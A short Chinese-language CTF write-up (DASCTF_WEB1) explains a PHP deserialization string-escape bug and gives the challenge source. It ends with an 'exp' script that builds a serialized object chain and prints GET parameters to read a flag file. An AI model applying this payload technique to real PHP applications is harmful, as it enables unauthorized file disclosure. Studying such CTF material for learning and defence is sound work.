DASCTF_WEB1
源碼
<?php
show_source("index.php");
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
class A{
public $username;
public $password;
function __construct($a, $b){
$this->username = $a;
$this->password = $b;
}
}
class B{
public $b = 'gqy';
function __destruct(){
$c = 'a'.$this->b;
echo $c;
}
}
class C{
public $c;
function __toString(){
//flag.txt
echo file_get_contents($this->c);
return 'nice';
}
}
$a = new A($_GET['a'],$_GET['b']);
//省略了存儲序列化數據的過程,下面是取出來並反序列化的操作
$b = unserialize(read(write(serialize($a))));
參考:https://www.cnblogs.com/magic-zero/p/11643916.html
分析
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
這兩個函數會因爲序列化的嚴格規則,造成字符串逃逸。
exp
<?php
class A{
public $username;
public $password;
}
class B{
public $b = 'gqy';
}
class C{
public $c = "flag.php";
}
$c = new C();
$b = new B();
$b->b = $c;
$exp = 'AAAA";s:5:"h3zh1";'.serialize($b);
$aa = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";
echo "a=".$aa."&b=".$exp;